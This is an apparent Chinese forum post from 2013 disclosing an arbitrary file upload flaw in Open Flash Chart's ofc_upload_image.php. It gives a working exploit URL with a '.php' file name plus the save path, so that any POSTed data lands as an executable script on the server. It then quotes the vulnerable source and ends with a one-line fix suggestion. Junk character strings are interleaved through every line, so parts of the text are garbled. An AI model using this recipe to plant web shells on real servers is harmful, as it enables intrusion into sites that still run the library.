POST 数据漏洞文件执行任意后缀文件保存
) y' h6 E( j* A2 g0 E 漏洞文件/chart/php-ofc-library/ofc_upload_image.php! M1 g( W ?( }6 V J( f n3 z
1 b. g! i/ y) g利用:% a8 ]' ]/ o5 }8 l
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名- V W% L3 f8 B1 w
3 R7 f/ }; F p& s5 |- h
Post任意数据
5 N2 M' Z! k# W保存位置http://localhost/chart/tmp-upload-images/hfy.php
+ w9 i" a" P4 ^ A/ X- P3 A+ U; S2 s2 N
& m) O3 d! l9 \: r8 x+ S最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~6 u; ~* _/ u I( L
7 e p) X0 g8 F- o2 W, ]
<?php! g: w. `& i+ z* k; ]
: d; b9 K3 t' ?
//
" [( `. ?+ t! I' I- x7 p8 t// In Open Flash Chart -> save_image debug mode, you
* ?0 ]# K& E2 g+ M& t L// will see the 'echo' text in a new window.. Z1 e/ m, ~$ R+ B" N( \5 Z# f4 u
//
9 N% d! \- G* G8 u3 ~/ R8 _: u- O/ }2 H# u l; d% [! w1 X6 p" _
/*+ ~7 B+ s/ C. R0 q+ f2 [7 P) u
; n( S; Z% x* i* cprint_r( $_GET );: ]# Y1 N% Y% u/ ]- \% M
print_r( $_POST );
D1 b- x" b3 E5 o: y+ r: O! K; hprint_r( $_FILES );
! x+ S8 _; p. h- X$ G e
. J4 L$ p. y. X/ z; mprint_r( $GLOBALS );
& E; `, t+ X/ z- O' X2 Tprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );& E: |. ]# n6 Q! ]4 T3 t J' B9 h
: Z8 _! j1 G3 v" A! o* V$ d' ^*/" z4 v( x; A% J2 N! A/ I
// default path for the image to be stored //
5 g. }6 k; ~6 O. z- q$default_path = '../tmp-upload-images/';
7 z. m$ ~7 o6 A4 o+ u$ f% c" ^1 W$ R# [! {3 R' @
if (!file_exists($default_path)) mkdir($default_path, 0777, true);0 Z. v X! B6 l# g) h8 p
; C1 M5 }, T4 C5 k! ^% Z9 \) `
// full path to the saved image including filename //
7 M% C0 q2 \, G+ ]9 e$destination = $default_path . basename( $_GET[ 'name' ] );
$ m c t$ Z& M/ k5 S. q4 }( k! K7 f2 C& ?# D4 k% E) P& e
echo 'Saving your image to: '. $destination;
. R3 X' t4 x6 T6 S( w; z- b6 q8 X' \// print_r( $_POST );
1 t, `: T3 q R; C9 G& h// print_r( $_SERVER );
. N" f$ E% s: b" y+ |! ~/ P0 y1 F4 u// echo $HTTP_RAW_POST_DATA;
0 B/ w2 e5 O9 h# ], J2 _2 r3 R' E1 N8 q* P4 Q& [6 S
//2 {8 O* Q- ~* M9 x
// POST data is usually string data, but we are passing a RAW .png) c$ }* _% u# C) l2 l
// so PHP is a bit confused and $_POST is empty. But it has saved2 e5 [. e7 F5 S+ [% W9 Y d0 e9 C8 ?
// the raw bits into $HTTP_RAW_POST_DATA
" V! D9 i1 g* q3 s1 L0 q$ i//' W3 Y0 I+ {. r- j3 S+ `
; A9 x& S0 f) D6 ?$jfh = fopen($destination, 'w') or die("can't open file");
4 k( F# K. I, n" M; j7 A# Vfwrite($jfh, $HTTP_RAW_POST_DATA);
* W- ^7 k( q j' yfclose($jfh);# T. \' O) v1 T2 N$ z' R
. G" ?& O" U+ C. ~' U* t( |6 ?
//
8 | w( F% J) W" E; m8 p// LOOK:# p: i9 Q: F$ [0 R
//; W0 C; Z0 i" J* l
exit();7 M- |& g6 r+ X
//' x8 T# \3 m( s" f, U3 C) O8 w- F
// PHP5:
, G; }% Y. n0 R5 F3 N% |//6 S! `. h9 @, `, A
" B8 N( A% D* n5 ^' h
! X& l2 V) o: X3 r
// default path for the image to be stored //' S5 A' z; y0 z5 u7 @- @- ^: L
$default_path = 'tmp-upload-images/';. s+ S* [/ n2 y E' t+ ~# Q6 e
+ \" Q; `; H j/ l4 l9 P8 Q
if (!file_exists($default_path)) mkdir($default_path, 0777, true);: C( x0 |: C* [
: K7 `; R, K/ R4 p( X# }! P/ ~
// full path to the saved image including filename //' x9 f% M3 L; m2 G) O
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
' s% p2 P* X$ c) N; ~
z4 e$ F9 B3 C% V& _* l9 w, U// move the image into the specified directory //
% d. r7 O8 M% W/ }7 l' X% H5 Wif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {+ m& S$ y) V5 e
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";* ^- R5 | E8 R" H5 Z" Y. q
} else {; Y5 z% U6 N; F3 ?
echo "FILE UPLOAD FAILED";
- f8 n8 E/ k6 q. R8 _0 K) s2 o}
' z( d. F( `6 P' ?0 k+ U/ h7 g# T8 P8 _. r
) K( W4 P, N5 }3 t
' p. N1 q4 [1 e7 j4 R. f( c?>& Y+ P& i2 ^# a) Y
- C1 Q: o: O. o v7 M$ ] K- N
- T$ t) u8 f' ?" \+ ~; d
: L. v6 s( z' h2 u/ e. h
8 X7 e, ]0 q: @5 h/ t8 s
! N( Y& o& L8 u1 v2 T" L4 d: t0 Q, w( t$ J7 q% Z7 P# l; w
修复方案:
7 k0 ~$ J9 Q7 L* a6 V4 q% f这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
# Z1 h. F7 A3 _- D: m* k! W
$ ~: q7 p% g( h. _
! x$ k" U/ H" E
9 o3 a( I# \3 q- `) X8 g
6 `8 `) c& Y% ~" f" b: S5 \! s |
发表于 2013-2-23 12:38:58
收藏
支持
反对